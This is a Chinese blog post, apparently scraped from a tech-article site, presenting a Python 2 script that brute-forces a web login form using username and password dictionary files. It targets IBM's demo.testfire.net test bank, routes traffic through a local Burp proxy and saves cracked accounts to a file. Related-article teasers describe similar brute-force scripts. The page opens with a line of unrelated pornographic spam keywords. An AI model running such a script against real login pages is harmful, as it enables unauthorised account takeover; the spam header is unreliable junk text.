国产xxxx99真实实拍_久久不雅视频_高清韩国a级特黄毛片_嗯老师别我我受不了了小说

資訊專欄INFORMATION COLUMN

使用 python 的 urllib2和 urllib模塊爆破 form 表單的簡易腳本

crossea / 597人閱讀

摘要:導入用戶名字典導入密碼的字典找到個賬號密碼輸入有點丑將就用下

python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法

腳本中還增加了 urllib2和 urllib模塊如何添加代理的方法

# -*- coding: utf-8 -*-
import urllib2
import urllib
import time


def brute_force(user, password):
    #strip() 方法用于移除字符串頭尾指定的字符(默認為空格)
    name = user.strip()
    passwd = password.strip()

    #添加代理:本地8080端口的代理是 burp 工具,主要是查看腳本發包回包的情況,好定位問題
    
    proxy = urllib2.ProxyHandler({"http":"http://127.0.0.1:8080"})
    opener = urllib2.build_opener(proxy)
    urllib2.install_opener(opener)

    #IBM 公司的一個 測試網站
    url1 = "http://demo.testfire.net/bank/login.aspx"
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
    headers = {"User-Agent":user_agent,"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://demo.testfire.net/bank/login.aspx"}
    values = {"uid": name, "passw": passwd,"btnSubmit":"Login"}
    data = urllib.urlencode(values)#可以把key-value這樣的鍵值對轉換成我們想要的格式,返回的是a=1&b=2這樣的字符串
    request = urllib2.Request(url1,data,headers)
    response = urllib2.urlopen(request)
    url2 = response.geturl()
    time.sleep(3)


    if url2 != url1:
        #因為urllib2 返回的頁面如果存在302重定向,返回的頁面是重定向之后的頁面,所以不能以302狀態碼來判斷是否登錄成功,
        #因為重定向之后的頁面訪問成功是200,不是302;所以以返回的頁面是不是發生變化來判斷是否是否登錄成功。

        print "---- find user:", name, " with password:",passwd, "-----"
        print url2
        outFile.write(name + ":" + passwd+"
" )
    else:
        print "----- error user:", name, " with password:",passwd, "-----"
        print url2
    response.close()
    return



outFile = open("accounts-cracked.txt", "w")

if __name__ == "__main__":
    #導入用戶名字典
    with open("user.dic", "r") as userline:
        y = userline.readlines()
        #導入密碼的字典
        with open("pass.dic", "r") as passline:
            b= passline.readlines()
            for u in y:
                for p in b:
                    brute_force(user=u,password=p)
                    
outFile.close()
with open("accounts-cracked.txt","r") as text:
    list = text.readlines()
    sum=len(list)

if sum>0:
    print "找到",sum,"個賬號密碼"
else:
    print "All thread OK,maybe not "

輸入有點丑,將就用下

文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。

轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/11236.html

相關文章

  • 使用 python urllib2 urllib模塊爆破 form 表單簡易腳本

    摘要:導入用戶名字典導入密碼的字典找到個賬號密碼輸入有點丑將就用下 python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法 腳本中還增加了 urllib2和 urllib模塊如何添加代理的方法 # -*- coding: utf-8 -*- import urllib2 import urllib import time def brute_f...

    loostudy 評論0 收藏0
  • 使用 python request模塊爆破 form 表單簡易腳本

    摘要:的中模塊在表單爆破的使用方法模塊中代理的使用方式模塊是中比較全的模塊簡單易用比之前文章中使用的都要好用可以替換為的方法方法用于移除字符串頭尾指定的字符默認為空格添加代理本地端口的代理是工具主要是查看腳本發包回包的情況好定位問題如 python 的 http 中 request模塊在web 表單爆破的使用方法 request模塊中代理的使用方式 request 模塊是http 中比較全...

    mgckid 評論0 收藏0
  • 使用 python request模塊爆破 form 表單簡易腳本

    摘要:的中模塊在表單爆破的使用方法模塊中代理的使用方式模塊是中比較全的模塊簡單易用比之前文章中使用的都要好用可以替換為的方法方法用于移除字符串頭尾指定的字符默認為空格添加代理本地端口的代理是工具主要是查看腳本發包回包的情況好定位問題如 python 的 http 中 request模塊在web 表單爆破的使用方法 request模塊中代理的使用方式 request 模塊是http 中比較全...

    alanoddsoff 評論0 收藏0
  • 使用 python httplib模塊爆破 form 表單簡易腳本

    摘要:包含了爆破的表單的使用方法中代理的添加方法添加代理代理本地監聽一個端口目的是查看發包和回包的情況測試網站為的靶機網站頁面返回的頁面找到個賬號密碼 httplib: 包含了 httplib爆破 web 的 form 表單的使用方法 httplib 中代理的添加方法 # -*- coding: utf-8 -*- import urllib import httplib import ...

    alighters 評論0 收藏0
  • 使用 python httplib模塊爆破 form 表單簡易腳本

    摘要:包含了爆破的表單的使用方法中代理的添加方法添加代理代理本地監聽一個端口目的是查看發包和回包的情況測試網站為的靶機網站頁面返回的頁面找到個賬號密碼 httplib: 包含了 httplib爆破 web 的 form 表單的使用方法 httplib 中代理的添加方法 # -*- coding: utf-8 -*- import urllib import httplib import ...

    IntMain 評論0 收藏0

發表評論

0條評論

最新活動
閱讀需要支付1元查看
<